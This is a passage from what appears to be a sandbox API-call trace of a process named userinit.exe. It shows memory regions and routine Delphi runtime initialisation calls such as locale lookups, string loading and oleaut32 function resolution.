filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 5075
start_va = 0x73d60000
end_va = 0x73d66fff
entry_point = 0x73d60000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 5076
start_va = 0x74480000
end_va = 0x744a0fff
entry_point = 0x74480000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 5077
start_va = 0x77070000
end_va = 0x770b4fff
entry_point = 0x77070000
region_type = mapped_file
name = "wldap32.dll"
filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll")
Region:
id = 5078
start_va = 0x3090000
end_va = 0x314ffff
entry_point = 0x3090000
region_type = mapped_file
name = "kernelbase.dll.mui"
filename = "\\Windows\\System32\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\kernelbase.dll.mui")
Region:
id = 5079
start_va = 0x31d0000
end_va = 0x320ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000031d0000"
filename = ""
Thread:
id = 275
os_tid = 0x6f8
[0158.154] GetModuleHandleA (lpModuleName=0x0) returned 0x400000
[0158.154] GetKeyboardType (nTypeFlag=0) returned 4
[0158.155] GetCommandLineA () returned="\"C:\\Windows\\System32\\userinit.exe\""
[0158.155] GetStartupInfoA (in: lpStartupInfo=0x14fbac | out: lpStartupInfo=0x14fbac*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\userinit.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff))
[0158.155] GetVersion () returned 0x1db10106
[0158.155] GetVersion () returned 0x1db10106
[0158.155] GetCurrentThreadId () returned 0x6f8
[0158.155] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x14f6a8, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0158.155] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x14f583, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0158.155] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f698 | out: phkResult=0x14f698*=0x0) returned 0x2
[0158.155] RegOpenKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Borland\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f698 | out: phkResult=0x14f698*=0x0) returned 0x2
[0158.155] RegOpenKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Borland\\Delphi\\Locales", ulOptions=0x0, samDesired=0xf0019, phkResult=0x14f698 | out: phkResult=0x14f698*=0x0) returned 0x2
[0158.155] lstrcpynA (in: lpString1=0x14f583, lpString2="C:\\Windows\\System32\\userinit.exe", iMaxLength=261 | out: lpString1="C:\\Windows\\System32\\userinit.exe") returned="C:\\Windows\\System32\\userinit.exe"
[0158.155] GetThreadLocale () returned 0x409
[0158.155] GetLocaleInfoA (in: Locale=0x409, LCType=0x3, lpLCData=0x14f693, cchData=5 | out: lpLCData="ENU") returned 4
[0158.156] lstrlenA (lpString="C:\\Windows\\System32\\userinit.exe") returned 32
[0158.156] lstrcpynA (in: lpString1=0x14f5a0, lpString2="ENU", iMaxLength=232 | out: lpString1="ENU") returned="ENU"
[0158.156] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.ENU", hFile=0x0, dwFlags=0x2) returned 0x0
[0158.156] lstrcpynA (in: lpString1=0x14f5a0, lpString2="EN", iMaxLength=232 | out: lpString1="EN") returned="EN"
[0158.156] LoadLibraryExA (lpLibFileName="C:\\Windows\\System32\\userinit.EN", hFile=0x0, dwFlags=0x2) returned 0x0
[0158.156] LoadStringA (in: hInstance=0x400000, uID=0xffc0, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Exception in safecall method") returned 0x1c
[0158.157] LocalAlloc (uFlags=0x0, uBytes=0xff8) returned 0x673640
[0158.157] VirtualAlloc (lpAddress=0x0, dwSize=0x100000, flAllocationType=0x2000, flProtect=0x1) returned 0x470000
[0158.157] LocalAlloc (uFlags=0x0, uBytes=0x644) returned 0x674640
[0158.157] VirtualAlloc (lpAddress=0x470000, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x470000
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffdf, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Interface not supported") returned 0x17
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffdd, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="External exception %x") returned 0x15
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffde, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Assertion failed") returned 0x10
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffd1, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Variant or safe array index out of bounds") returned 0x29
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffd9, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Invalid argument") returned 0x10
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffd0, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Error creating variant or safe array") returned 0x24
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffed, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Variant method calls not supported") returned 0x22
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffd4, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Invalid variant operation") returned 0x19
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffd3, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Invalid variant type conversion") returned 0x1f
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffe5, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Stack overflow") returned 0xe
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffe6, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Control-C hit") returned 0xd
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffe7, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Privileged instruction") returned 0x16
[0158.157] LoadStringA (in: hInstance=0x400000, uID=0xffe4, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Access violation") returned 0x10
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xffe2, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Invalid class typecast") returned 0x16
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xffe0, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Floating point underflow") returned 0x18
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xffff, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Floating point overflow") returned 0x17
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfffe, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Floating point division by zero") returned 0x1f
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfffd, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Invalid floating point operation") returned 0x20
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfffc, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Integer overflow") returned 0x10
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfffb, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Range check error") returned 0x11
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfffa, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Division by zero") returned 0x10
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfff9, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Invalid numeric input") returned 0x15
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfff8, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Disk full") returned 0x9
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfff7, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Read beyond end of file") returned 0x17
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfff6, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="File access denied") returned 0x12
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfff5, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Too many open files") returned 0x13
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfff4, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="Invalid filename") returned 0x10
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfff3, lpBuffer=0x14f7cc, cchBufferMax=1024 | out: lpBuffer="File not found") returned 0xe
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xfff1, lpBuffer=0x14f7b8, cchBufferMax=1024 | out: lpBuffer="Out of memory") returned 0xd
[0158.158] LoadStringA (in: hInstance=0x400000, uID=0xffe1, lpBuffer=0x14f7b8, cchBufferMax=1024 | out: lpBuffer="Invalid pointer operation") returned 0x19
[0158.158] GetVersionExA (in: lpVersionInformation=0x14fb50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14fb50*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0158.158] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0158.158] GetProcAddress (hModule=0x75370000, lpProcName="GetDiskFreeSpaceExA") returned 0x753ff46f
[0158.158] GetThreadLocale () returned 0x409
[0158.158] GetThreadLocale () returned 0x409
[0158.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x44, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Jan") returned 4
[0158.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x38, lpLCData=0x14fa28, cchData=256 | out: lpLCData="January") returned 8
[0158.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x45, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Feb") returned 4
[0158.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x39, lpLCData=0x14fa28, cchData=256 | out: lpLCData="February") returned 9
[0158.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x46, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Mar") returned 4
[0158.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x3a, lpLCData=0x14fa28, cchData=256 | out: lpLCData="March") returned 6
[0158.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x47, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Apr") returned 4
[0158.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x3b, lpLCData=0x14fa28, cchData=256 | out: lpLCData="April") returned 6
[0158.158] GetLocaleInfoA (in: Locale=0x409, LCType=0x48, lpLCData=0x14fa28, cchData=256 | out: lpLCData="May") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x3c, lpLCData=0x14fa28, cchData=256 | out: lpLCData="May") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x49, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Jun") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x3d, lpLCData=0x14fa28, cchData=256 | out: lpLCData="June") returned 5
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4a, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Jul") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x3e, lpLCData=0x14fa28, cchData=256 | out: lpLCData="July") returned 5
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4b, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Aug") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x3f, lpLCData=0x14fa28, cchData=256 | out: lpLCData="August") returned 7
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4c, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Sep") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x14fa28, cchData=256 | out: lpLCData="September") returned 10
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Oct") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x14fa28, cchData=256 | out: lpLCData="October") returned 8
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Nov") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x14fa28, cchData=256 | out: lpLCData="November") returned 9
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Dec") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x14fa28, cchData=256 | out: lpLCData="December") returned 9
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Sun") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Sunday") returned 7
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Mon") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Monday") returned 7
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Tue") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Tuesday") returned 8
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Wed") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Wednesday") returned 10
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Thu") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Thursday") returned 9
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Fri") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Friday") returned 7
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Sat") returned 4
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x14fa28, cchData=256 | out: lpLCData="Saturday") returned 9
[0158.159] GetThreadLocale () returned 0x409
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x14fa84, cchData=256 | out: lpLCData="$") returned 2
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x14fa84, cchData=256 | out: lpLCData="0") returned 2
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x14fa84, cchData=256 | out: lpLCData="0") returned 2
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x14fb7c, cchData=2 | out: lpLCData=",") returned 2
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x14fb7c, cchData=2 | out: lpLCData=".") returned 2
[0158.159] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x14fa84, cchData=256 | out: lpLCData="2") returned 2
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x14fb7c, cchData=2 | out: lpLCData="/") returned 2
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x14fa84, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0158.160] GetThreadLocale () returned 0x409
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x14fa50, cchData=256 | out: lpLCData="1") returned 2
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x14fa84, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0158.160] GetThreadLocale () returned 0x409
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x14fa50, cchData=256 | out: lpLCData="1") returned 2
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x14fb7c, cchData=2 | out: lpLCData=":") returned 2
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x14fa84, cchData=256 | out: lpLCData="AM") returned 3
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x14fa84, cchData=256 | out: lpLCData="PM") returned 3
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x14fa84, cchData=256 | out: lpLCData="0") returned 2
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x14fa84, cchData=256 | out: lpLCData="0") returned 2
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x14fa84, cchData=256 | out: lpLCData="0") returned 2
[0158.160] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x14fb7c, cchData=2 | out: lpLCData=",") returned 2
[0158.160] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0158.160] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0158.160] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0158.160] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0158.160] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0158.161] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0158.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0158.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0158.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0158.162] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0158.162] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0x60
[0158.162] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0x64
[0158.162] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x68
[0158.162] GetDC (hWnd=0x0) returned 0x4f010863
[0158.162] GetDeviceCaps (hdc=0x4f010863, index=90) returned 96
[0158.162] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0158.163] GetDC (hWnd=0x0) returned 0x4f010863
[0158.163] GetDeviceCaps (hdc=0x4f010863, index=104) returned 0
[0158.163] ReleaseDC (hWnd=0x0, hDC=0x4f010863) returned 1
[0158.163] CreatePalette (plpal=0x14f7e0) returned 0xa508084a
[0158.163] GetStockObject (i=7) returned 0x1b00017
[0158.163] GetStockObject (i=5) returned 0x1900015
[0158.163] GetStockObject (i=13) returned 0x18a002e
[0158.163] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0158.163] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0158.163] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff4d, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff4c, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff4b, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff4a, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff49, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff48, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff46, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff45, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff43, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff42, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0158.163] LoadStringA (in: hInstance=0x400000, uID=0xff41, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff40, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff5f, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff5e, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff5d, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff5c, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff06, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff05, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff04, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff03, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff02, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff01, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff00, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff1f, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff1e, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff1d, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff1c, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff1b, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff1a, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff19, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0158.164] LoadStringA (in: hInstance=0x400000, uID=0xff18, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff17, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff16, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff15, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff14, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff13, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff12, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff11, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff10, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff2f, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff2e, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff2d, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff2c, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0158.165] LoadStringA (in: hInstance=0x400000, uID=0xff2b, lpBuffer=0x14f7dc, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
